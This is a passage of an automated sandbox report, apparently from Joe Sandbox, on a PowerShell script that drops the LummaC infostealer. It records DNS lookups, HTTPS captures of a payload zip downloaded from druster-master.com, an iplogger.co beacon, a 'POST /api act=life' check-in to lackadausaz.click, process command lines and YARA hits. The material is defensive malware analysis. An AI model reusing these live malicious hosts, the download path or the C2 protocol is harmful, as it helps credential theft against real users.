Dec 28, 2024 09:16:12.299148083 CET	49732	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:12.344563961 CET	49732	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:12.344594955 CET	443	49732	172.67.198.222	192.168.2.4
Dec 28, 2024 09:16:12.618557930 CET	49733	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:12.618623972 CET	443	49733	172.67.198.222	192.168.2.4
Dec 28, 2024 09:16:12.618695021 CET	49733	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:12.620002985 CET	49733	443	192.168.2.4	172.67.198.222
Dec 28, 2024 09:16:12.620018005 CET	443	49733	172.67.198.222	192.168.2.4
Dec 28, 2024 09:16:13.900016069 CET	49733	443	192.168.2.4	172.67.198.222

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:16:02.176696062 CET	53933	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:16:02.481498003 CET	53	53933	1.1.1.1	192.168.2.4
Dec 28, 2024 09:16:05.310770035 CET	55979	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:16:05.636722088 CET	53	55979	1.1.1.1	192.168.2.4
Dec 28, 2024 09:16:09.941924095 CET	53150	53	192.168.2.4	1.1.1.1
Dec 28, 2024 09:16:10.268238068 CET	53	53150	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 09:16:02.176696062 CET	192.168.2.4	1.1.1.1	0xe62e	Standard query (0)	druster-master.com	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:16:05.310770035 CET	192.168.2.4	1.1.1.1	0x5bf7	Standard query (0)	iplogger.co	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:16:09.941924095 CET	192.168.2.4	1.1.1.1	0x8192	Standard query (0)	lackadausaz.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 09:16:02.481498003 CET	1.1.1.1	192.168.2.4	0xe62e	No error (0)	druster-master.com	104.21.64.85	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:16:02.481498003 CET	1.1.1.1	192.168.2.4	0xe62e	No error (0)	druster-master.com	172.67.179.114	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:16:05.636722088 CET	1.1.1.1	192.168.2.4	0x5bf7	No error (0)	iplogger.co	172.67.167.249	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:16:05.636722088 CET	1.1.1.1	192.168.2.4	0x5bf7	No error (0)	iplogger.co	104.21.82.93	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:16:10.268238068 CET	1.1.1.1	192.168.2.4	0x8192	No error (0)	lackadausaz.click	172.67.198.222	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:16:10.268238068 CET	1.1.1.1	192.168.2.4	0x8192	No error (0)	lackadausaz.click	104.21.92.219	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

druster-master.com

iplogger.co

lackadausaz.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.64.85	443	7428	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:16:03 UTC	176	OUT	GET /gogolend1.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: druster-master.com Connection: Keep-Alive
2024-12-28 08:16:04 UTC	909	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:16:04 GMT Content-Type: application/zip Content-Length: 365995 Connection: close Last-Modified: Thu, 26 Dec 2024 22:14:51 GMT ETag: "676dd55b-595ab" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 1680 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J%2FpXgK0dzd0Qqpq1BoZul1zGllU%2BGCr6J4UF%2BCUxoKqBBq9FeotDPKSX0G7tbfB58JgxuqnXO7LSIZukNjQHck2ykjCiYx3fPa6zj6veCZFLhtG8Py7szWdBEZJ%2BfPbUatfe2QA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f901b296960c477-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1508&rtt_var=598&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=790&delivery_rate=1781574&cwnd=181&unsent_bytes=0&cid=59d433ea56109c6a&ts=461&x=0"
2024-12-28 08:16:04 UTC	460	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 f4 bc 9a 59 c6 08 b5 22 99 5c 05 00 00 0c 0a 00 06 00 00 00 63 72 2e 64 6c 6c ec fd 79 5c d4 d5 1b 3f 0c cf 51 30 54 88 51 a1 c8 30 47 05 d3 14 d3 64 4a cb b5 1c d3 d2 c2 dd 0a 4d 04 84 49 04 63 71 cb 0a 45 2c 22 0a 35 53 32 35 97 4c d3 b2 cc 70 ab c4 25 b1 32 43 c5 a5 34 77 0d 01 97 8c 8c 14 99 e7 7d bd cf 99 11 bf df ef ef b9 ef d7 f3 7a fe bb 6f 71 66 3e cb f9 9c 73 9d 6b 3f d7 b9 ce f9 f4 7f 3e d7 52 db 62 b1 78 e1 e3 72 59 2c 1b 2d fa 5f 0f cb ff f5 bf 74 7c ee 6c ba f9 4e cb fa ba 3f 37 db a8 fa fd dc 6c 70 bc 33 c5 36 3e 39 29 2e 39 6a 9c 2d 3a 2a 31 31 29 d5 36 3a d6 96 9c 96 68 73 26 da 7a 3d 3b c8 36 2e 29 26 b6 9d 9f 5f bd 10 53 47 84 c3 62 e9 a7 ea 59 ea 6c 1d 17 e7 ae f7 a4 e5 ce 16 f5 55 ad fb 2d 6f e1 c4 a7 9e Data Ascii: PKY"\cr.dlly\?Q0TQ0GdJMIcqE,"5S25Lp%2C4w}zoqf>sk?>RbxrY,-_t\|lN?7lp36>9).9j-:*11)6:hs&z=;6.)&_SGbYlU-o
2024-12-28 08:16:04 UTC	1369	IN	Data Raw: 57 84 a9 cf ab de 7f 97 4b 4d 20 7c 52 8d 65 94 29 57 e7 7f 94 4b 8e 4d 48 8a b6 68 1a 8e d7 bc 61 f1 f9 af 72 8f 5b fe 1f fa 2f a3 3c b8 d0 2b c4 62 ab 13 5f b2 6d 26 4e 77 06 ef c8 59 df 52 ee e4 e4 cb f7 b0 a1 83 32 ca ad d9 bd 42 42 32 0b d2 92 97 f8 a2 60 87 fd 99 05 af 0d cb 28 51 d9 5d 27 f5 c4 e9 b5 65 72 b5 ac 41 4e 6a 4b 4b 2e 2a 2b 01 aa 5d 87 33 ca bd 36 8b 60 66 5d b9 e2 ff 65 60 04 4a 64 ed 40 15 27 96 0c c6 61 46 65 2d ff 19 fb 70 17 c5 9b 0a a3 7e fc 86 c5 c2 e2 19 3b ad 59 45 2f 8c 7c 71 bb af 85 f5 65 54 aa b4 f3 31 4b 44 c4 74 73 d9 c3 bd 3a 5c 2b 0b 36 40 e6 76 de e1 3f e3 0b 5d 91 a7 5d 36 d9 44 9a 44 83 c7 3b 1c 35 4d 2a ff 19 97 50 92 67 99 05 fe 33 66 b9 4f 78 6b 35 ce 32 8f a6 4e 5c 92 e0 2d b7 53 83 b3 07 87 b4 2a ec 15 e2 25 8c Data Ascii: WKM \|Re)WKMHhar[/<+b_m&NwYR2BB2`(Q]'erANjKK.+]36`f]e`Jd@'aFe-p~;YE/\|qeT1KDts:\+6@v?]]6DD;5MPg3fOxk52N\-S*%
2024-12-28 08:16:04 UTC	1369	IN	Data Raw: 2c 38 e0 d3 b8 c9 b6 14 f0 43 b4 33 16 dc b1 2e d5 29 9c 93 6f 4b 8d 07 73 6d 9e 6c 73 e2 ec bb 14 5b 4a 52 a1 63 7b 1a 2f ee 02 c7 45 15 3a 7e 4c 1e d7 4e f8 75 ef 40 4b 61 66 2a 40 70 4c 72 a6 14 66 4e c2 51 aa 2d 26 b9 30 73 2a 8e a2 26 da d0 44 7a ec b8 58 30 d9 8c d1 b1 c9 b6 42 c7 9b e3 93 52 c0 aa 6f a7 3a 27 a0 b6 5c 5b d4 04 d4 f6 9e 33 21 6a 74 a1 63 7e 42 ac 2d ba d0 f1 61 52 e2 18 dc fb 28 39 36 31 1a 4d 2c 8f 45 13 cf a1 3a 8c 1d 50 f1 08 1c c5 d8 12 93 0a 33 a3 a4 31 67 74 6c 61 66 2c 8e 6c 09 02 80 93 00 8c 46 b9 71 38 8a 8d 1a db ae 30 73 3c 8e da d9 fa a0 96 16 38 1a 94 36 66 4c 61 e6 fd 72 37 d9 86 67 db e0 28 65 7c 6c 74 61 e6 83 38 72 42 0e 0b 33 3b e2 68 b2 2d 6a 62 61 e6 23 d2 8d c9 b6 71 85 99 8f c9 91 33 31 b5 30 b3 bb 3e 42 cd 4f Data Ascii: ,8C3.)oKsmls[JRc{/E:~LNu@Kaf@pLrfNQ-&0s&DzX0BRo:'\[3!jtc~B-aR(961M,E:P31gtlaf,lFq80s<86fLar7g(e\|lta8rB3;h-jba#q310>BO
2024-12-28 08:16:04 UTC	1369	IN	Data Raw: ff ea a9 81 e2 be 9e 84 53 05 3d db 42 00 43 f9 62 a3 b2 8a 6e 57 59 7b 6e a9 ac 5a a2 b2 36 58 fc 37 40 65 ed c9 78 75 cf 7f a9 ac d9 b3 29 95 8b 57 6a 7d b0 18 43 8c 71 56 f1 a4 ea 8a c4 5b bd 5f 86 64 b7 16 2f c5 1a fa d7 76 97 4b bb 5e f8 aa 54 45 ce 02 ef 62 8b 25 6c f5 7e 8b c5 be e1 2f 01 d7 9a 2d 1a a3 bd 68 37 b8 57 3e 7e 47 41 c9 36 f0 cd c5 d1 a9 10 1f a9 c1 eb 2e 97 fd af 01 2e 57 33 56 69 bf 58 bf 71 71 0d 60 12 ef 21 30 17 fc 09 cc c7 c1 d0 9f e3 6c 00 c6 27 34 f8 3c b0 5f f4 cd 9d ca 62 9a 6e fc 86 c5 12 7a f5 a2 b4 6a cb 18 27 1e 65 b0 7d e6 60 d1 8d ac f8 fb 4d d2 86 0d 8e bf 68 5c 38 fd 61 33 02 45 35 2d 1d d9 b0 9a aa d6 6a 1f f5 81 cb 55 a3 ed dd 6b 45 db 54 0e a6 26 aa e8 75 4a 2c 54 50 47 68 e2 8b 2f b2 3f a8 a7 c2 fb 8f 01 46 b3 05 Data Ascii: S=BCbnWY{nZ6X7@exu)Wj}CqV[_d/vK^TEb%l~/-h7W>~GA6..W3ViXqq`!0l'4<_bnzj'e}`Mh\8a3E5-jUkET&uJ,TPGh/?F
2024-12-28 08:16:04 UTC	1369	IN	Data Raw: 12 12 7a 3b 09 03 cf 5d 8e 5c 8b 56 27 4f 8b 12 25 a5 01 54 9a 56 5e e3 a5 2e 2a af e8 a4 71 e3 b5 f2 d2 23 48 51 5e 29 d1 ce 58 ad bc 12 53 9d 29 5a 79 a5 b6 b3 0d d3 ca 2b 1e 80 68 55 6a 1b ed 34 fe 6e 82 6d 9c 88 a2 f5 a6 e6 2e df 96 b4 d4 54 22 5a 6b 79 e5 64 0e 36 bc 76 5f b5 e1 b5 93 a1 3e e9 d5 2e bf 68 68 a2 d6 22 1f 67 c3 76 74 11 36 3e e2 1d 8e a1 53 e8 33 99 e2 6b 95 50 2c af 28 f9 3e 12 f6 80 53 59 94 8c d6 c4 c3 29 0b c9 1e 52 c5 21 0b 46 65 a2 1b 02 b2 f6 75 d8 c6 6b 3e 90 a6 1f df b4 9a 58 d3 63 0e eb d4 e2 dc dc 1a 8c 75 73 0c 19 6b 44 32 69 7e e0 8a 78 1a 15 4a 6c 6d 86 43 b8 47 f4 56 65 e8 e4 4a 8b c5 fb 8e 9f c0 5a 11 c3 c4 fd aa 6c 21 f2 e5 43 d5 e4 23 d6 da 3e f2 90 68 0a 58 ed ca b0 bf 5f 37 7a cb 87 2c 16 60 5f f9 53 b5 3b 96 73 56 Data Ascii: z;]\V'O%TV^.*q#HQ^)XS)Zy+hUj4nm.T"Zkyd6v_>.hh"gvt6>S3kP,(>SY)R!Feuk>XcuskD2i~xJlmCGVeJZl!C#>hX_7z,`_S;sV
2024-12-28 08:16:04 UTC	1369	IN	Data Raw: d4 d9 51 99 fc 69 c6 ab 55 96 d4 7a 10 7a 0e 0d 44 05 16 dd 36 b5 56 f5 f7 73 d4 82 b3 2f 51 f6 56 75 e6 0c 5b ce 08 f9 29 6f 7e 83 d6 f1 a7 12 b9 77 f6 48 8a 9c 6d ea 9d 94 3c 0e 5e 92 36 76 db 92 e0 ab c0 4b 4a 4c a3 97 34 3a 29 06 c3 c9 9f 6d e3 e0 bf 38 f6 a5 38 93 20 58 07 6d a3 a3 20 89 bf 26 b4 b3 3d 5e e8 f8 3d 96 31 2b c7 29 99 6f 9b f3 4c 94 3c 3d 0f 26 23 5a 46 a1 89 a9 30 79 8b 93 27 43 ac 1c cb a2 64 8c e6 f8 24 da 39 1e 86 6c 75 62 2a c6 78 8e b5 51 e3 a4 9d af a2 93 26 48 25 1b c4 aa 8d 95 98 ff 04 09 d2 27 51 a2 a0 04 32 53 18 9a c3 f0 35 73 a2 c7 01 7b c5 e3 80 41 05 bb c6 44 25 43 cc 33 6c bd c5 2c bf 91 6c 93 c1 6d f6 98 54 19 d5 be 1b 9d ea b4 50 af 5b e9 e3 bc e9 38 c3 33 50 23 bb 7f 00 9c 6b f5 a3 5c ad 65 2e 6e f7 cf 77 9c 79 b3 56 Data Ascii: QiUzzD6Vs/QVu[)o~wHm<^6vKJL4:)m88 Xm &=^=1+)oL<=&#ZF0y'Cd$9lub*xQ&H%'Q2S5s{AD%C3l,lmTP[83P#k\e.nwyV
2024-12-28 08:16:04 UTC	1369	IN	Data Raw: 18 ea f3 d6 9f 2b 6a 40 3e 35 85 83 a1 7b 47 90 58 de bd 84 58 01 a1 11 e1 d0 ab ed 76 40 01 42 ff c9 0c 6e 47 87 8f 3b 66 17 e0 2c f8 a2 ae 8c d7 08 be b3 e0 fd ab d5 3a 3e 17 e0 b7 68 9e b6 23 61 f7 d5 02 7a 67 de 01 c7 af 78 bf 3b 79 44 4a eb 72 d0 6b f6 05 39 14 4f 1f 31 02 eb 65 da 67 a0 cd 48 67 80 fd 93 61 b7 21 f7 cd ab e4 e8 8d 15 a4 f3 a8 cf ab 5d 12 d2 cf 70 48 10 38 d8 af ef 58 2d bd b0 59 cd 04 c2 e0 b0 25 cb 21 d4 fd 61 c8 cc e5 b0 9b 3f 4a ef 2b 65 fa d7 84 8e ed 03 ea ac bd 54 a3 89 91 bf 93 95 8a 7f 62 13 63 a0 37 37 a6 d4 a3 9a 15 88 87 54 98 18 af e8 27 28 44 b0 93 df e1 10 3d 67 af c9 a4 67 47 44 7b bd 74 43 18 2c 28 74 0d c4 c3 be e0 19 7a 0b 86 7d b7 9f 19 ed 57 a3 cd 17 0a c9 33 2f cc 24 e6 ef 0b 53 16 ad 40 03 fc 6e 6e ad 76 d9 07 Data Ascii: +j@>5{GXXv@BnG;f,:>h#azgx;yDJrk9O1egHga!]pH8X-Y%!a?J+eTbc77T'(D=ggGD{tC,(tz}W3/$S@nnv
2024-12-28 08:16:04 UTC	1369	IN	Data Raw: 0c 94 2d 27 f7 ed 7b 38 24 81 b1 de d7 93 38 b6 29 86 5f ed d5 d5 b7 f9 7c 07 86 13 ca c5 6d 68 a8 13 e3 c4 8a f9 e8 f1 4c a5 df fd 93 f5 50 27 40 15 71 bc eb c3 1c 92 00 b6 19 e0 27 1a b7 a3 a3 c2 3e 29 50 38 c7 aa c7 d4 56 fb dc 64 4f 1e aa 4d e7 6d 15 bd 4a 14 4c 59 cf 49 8b 88 c9 0c 89 56 b1 e1 92 fa de 34 91 63 96 72 26 bf 7f 54 62 14 0c 53 9c c4 ed 1d 8b f5 54 d6 b2 d8 68 89 c0 7c 12 63 1b 8f 8b ab 93 53 e4 6c 2d ac 1e 4a 7e e5 4c b6 c9 4c fe b8 f1 62 de b6 a4 46 25 c2 60 6e d5 f3 62 3b c6 d9 24 64 53 38 31 6a 32 6a f9 a9 9d ad 0f 4a fe 92 92 9a 94 bc cb 71 c0 4c e8 3f eb 4c b0 e9 f0 66 0a 73 bd d2 19 f8 77 cc 88 9a 90 84 c2 6f c6 d8 24 31 fa ed 54 ce c1 e5 3a 63 27 72 42 3f 26 c9 a2 73 a9 86 39 53 e3 75 2e 55 52 5a aa c9 a5 1a 17 35 79 b4 ce a5 82 Data Ascii: -'{8$8)_\|mhLP'@q'>)P8VdOMmJLYIV4cr&TbSTh\|cSl-J~LLbF%`nb;$dS81j2jJqL?Lfswo$1T:c'rB?&s9Su.URZ5y
2024-12-28 08:16:04 UTC	1369	IN	Data Raw: 7b 89 49 e8 df 74 b4 98 c5 54 7e a1 51 e2 bf db c0 3d de 4f 9c 41 ff 13 9b 42 80 87 ad 01 e5 46 bd 6a 82 2d 95 f6 88 ac fb 67 d6 e8 55 72 47 f2 c7 1f eb 18 11 ff ce cf 48 b8 a3 c2 30 67 0b ad 4a 04 f8 cc 97 cc a4 43 65 0b f7 6d 13 c0 6b 57 88 36 1e 38 26 7d 8d 7a db f4 55 97 04 cc f6 77 7b b9 05 cf fe c3 5b 12 12 aa 70 16 0c ec 65 a2 4a 95 ce 82 e6 40 52 5d 8d b4 ab 63 7b 1c ad 01 5c 75 33 aa f1 1f 9e 26 d9 5f 7a 41 aa 0e f6 7b f3 4d 71 f3 be ba 1f 0c b4 e2 55 e1 dc aa ec 21 3e ff ec 6f 56 e4 37 21 c3 b8 73 40 54 10 ab 0c c2 70 ca 3b ab 4a a7 e6 77 74 04 84 c5 3c 6d 52 ea 2b 4d 82 a5 49 ed 1f f6 d5 6d 4e 9d 65 37 65 b7 dd 54 ca 6e ee 2b d5 2e 5d dc e6 b7 6f b8 3b d0 54 41 01 b0 b9 b3 0d 24 c5 76 d7 4f a2 b3 39 41 97 7b a2 85 45 a7 6b 86 3e b7 03 e8 49 af Data Ascii: {ItT~Q=OABFj-gUrGH0gJCemkW68&}zUw{[peJ@R]c{\u3&_zA{MqU!>oV7!s@Tp;Jwt<mR+MImNe7eTn+.]o;TA$vO9A{Ek>I
2024-12-28 08:16:04 UTC	1369	IN	Data Raw: 18 47 5f e2 90 d7 cb af 16 c7 a1 8b ec 2e 57 49 05 1b dc 98 ed d8 8d be 1c e9 e8 38 a6 43 87 7e 5d 5f 93 6a 8f 01 10 bf e7 2b d1 aa da 6f d1 99 e5 7b 32 1c 3b 25 18 18 1c 50 4b af 17 6a c2 76 dc 2d 7b ba 64 d5 88 f7 f5 80 00 7d b6 5b ba 6a 2e 60 30 6d 25 2d d6 67 13 97 3b 9d 05 a3 72 18 c1 ac ef 28 69 e1 38 9b 93 eb 1f a4 2c 66 09 90 e4 60 85 b6 d3 53 21 45 d9 43 76 53 f9 ec 96 8b 1f af 86 ca 39 ff b4 b2 e8 a1 77 f0 c0 03 2e 97 6e 28 48 46 f7 99 b3 f4 22 a6 d0 db 90 51 13 26 77 c6 d7 43 28 51 72 9d d8 f8 02 a0 b7 d1 c4 6d e3 d8 23 14 3f 22 66 27 a5 25 f0 d0 a3 9b e0 61 27 5b df 63 6f 3f 4d bb 20 25 04 a8 24 63 dc 59 95 3d 04 74 2b 56 3a 3d b2 23 51 da c2 b1 3b b4 cf 53 64 2d bf ee 75 4d 64 bc 18 1c 83 16 76 77 70 1c 13 2c be 3c 83 2b 00 02 fa 5d 15 b6 98 Data Ascii: G_.WI8C~]_j+o{2;%PKjv-{d}[j.`0m%-g;r(i8,f`S!ECvS9w.n(HF"Q&wC(Qrm#?"f'%a'[co?M %$cY=t+V:=#Q;Sd-uMdvwp,<+]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	172.67.167.249	443	7428	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:16:06 UTC	162	OUT	GET /1EnxJ4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: iplogger.co Connection: Keep-Alive
2024-12-28 08:16:07 UTC	1353	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:16:07 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close Set-Cookie: 56671078137264061=3; expires=Sun, 28 Dec 2025 08:16:07 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=8.46.123.189; expires=Sun, 28 Dec 2025 08:16:07 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict memory: 0.43070220947265625 expires: Sat, 28 Dec 2024 08:16:07 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=daUgL0JYlIwaR0mfEZ%2FNWGBQjfimacPj1IIsZpuYF%2FgG4brsZzEmAZ9LPfZigTSip542DWrxLWafjpZydCOIyXQLh5bbcYlKcWEjEKWtyNXOutKtSjBtgksFEiE9bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f901b3cdb04f5fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1571&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=776&delivery_rate=1717647&cwnd=252&unsent_bytes=0&cid=37fc21b1d976a671&ts=802&x=0"
2024-12-28 08:16:07 UTC	16	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d Data Ascii: 74PNG
2024-12-28 08:16:07 UTC	106	IN	Data Raw: 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: IHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-12-28 08:16:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	172.67.198.222	443	7712	C:\ProgramData\extract\ronwod.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:16:11 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lackadausaz.click
2024-12-28 08:16:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-28 08:16:12 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:16:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j29pvrj7v8u734ikq8jkettuej; expires=Wed, 23 Apr 2025 02:02:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LijKRUvdqsNVqcXVnvGr%2BIU%2FwBJs94gZapl7sKutdEjUMJeJj8z5sWhqcPiiVXEMtQz7ZzjUeArJDZAO9jhjgdcDASUM6G1yWRMul2zt0aofix%2FR41Jvxe6BU0dMZgWNIThPCA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f901b59e9c61889-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1679&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1663817&cwnd=252&unsent_bytes=0&cid=07677cd528b7219e&ts=768&x=0"
2024-12-28 08:16:12 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-28 08:16:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:15:59
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\lumma.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:15:59
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:16:09
Start date:	28/12/2024
Path:	C:\ProgramData\extract\ronwod.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\extract\ronwod.exe"
Imagebase:	0xa10000
File size:	28'672 bytes
MD5 hash:	63FF0C8E75AA669F22E79EBF017C0AA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 43%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Function 00007FFD9B8B3885 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1825571345.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 8dd99c00d2b5232e8c8893b63629beb041e4eb1b66b2265b9d34caf5e4ecca12
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: 0901677121CB0C4FD748EF0CE451AA5B7E0FB99364F50056EE58AC36A5D636E881CB46

Analysis Process: ronwod.exePID: 7712, Parent PID: 7428COMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	66.2%
Signature Coverage:	45.9%
Total number of Nodes:	74
Total number of Limit Nodes:	4

Executed Functions

Function 6C524FC9 Relevance: 72.6, APIs: 2, Strings: 39, Instructions: 894
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL ref: 6C525CCC
NtProtectVirtualMemory.NTDLL ref: 6C525D02

Strings

Avoid or wif, xrefs: 6C5254C9
eCKvXrCJRPK, xrefs: 6C52530B
hPvMIxsUgRaN, xrefs: 6C525AD4
Central nice light I well finally, xrefs: 6C5252B2
VApoEtMgLZ, xrefs: 6C52560B
AKFJELa, xrefs: 6C525AE4
Truth think they push or. Fish w, xrefs: 6C5254DA
FRjsvCUyOKFU, xrefs: 6C5258C9
ezFgPGo, xrefs: 6C5254E4
tvXmLl, xrefs: 6C525325
EyNqwGCPzUHW, xrefs: 6C525A08
-, xrefs: 6C52500B
UHMDZa, xrefs: 6C52594F
SeIJrUWs, xrefs: 6C525B73
EJhHGmR, xrefs: 6C525A50
[, xrefs: 6C525ACC
IhBeBowcYgRE, xrefs: 6C525831
YAUypMTMuW, xrefs: 6C52521D
nBHmnQYEVluy, xrefs: 6C525418
ppWFQTeJs, xrefs: 6C52543B
WPlwVTzy, xrefs: 6C525AF6
MqrhQbj, xrefs: 6C525A60
LDsJmNmy, xrefs: 6C525761
eiwbYNn, xrefs: 6C525373
idBFWFCLAT, xrefs: 6C525839
wor, xrefs: 6C5250F5
New young her. Role ever old, xrefs: 6C525313
CrqvGT, xrefs: 6C525974
War medical receiveAvoid or wif, xrefs: 6C5256A6
